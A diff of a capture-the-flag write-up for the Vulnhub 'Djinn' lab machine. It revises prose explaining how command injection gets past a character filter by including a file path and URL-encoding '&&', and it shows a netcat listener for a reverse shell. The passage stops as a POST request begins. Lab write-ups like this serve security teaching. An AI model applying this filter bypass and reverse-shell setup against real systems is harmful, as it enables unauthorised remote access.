joeynaor/writeups/2019-11-27_Vulnhub_Djin1.md

 ```

-From this I understand that if we add `"/home/nitish/.dev/creds.txt"` to our command injection,
+By reading this we can understand that if we add `"/home/nitish/.dev/creds.txt"` to our command injection,
-and don't have `cat` command, we will be able to bypass the character block we encountered earlier,
-and establish a reverse shell.
+while not having the `cat` command at the same time, we will be able to bypass the restrictions we encountered earlier, use all characters and establish a reverse shell.

-First of all, we must listen for incoming connections:
+First of all, we must listen for incoming connections on our Kali machine:
 ```bash
 nc -nlvp 7777
 ```

-Next, we start to establish the reverse shell. `%26%26` is the URL encoding for `&&`,
+Next, we try to establish the reverse shell. `%26%26` is the URL encoding for `&&`,
 which lets us bypass character blocking because `/home/nitish/.dev/creds.txt` is technically a part of the command:
 ```http
 POST /wish HTTP/1.1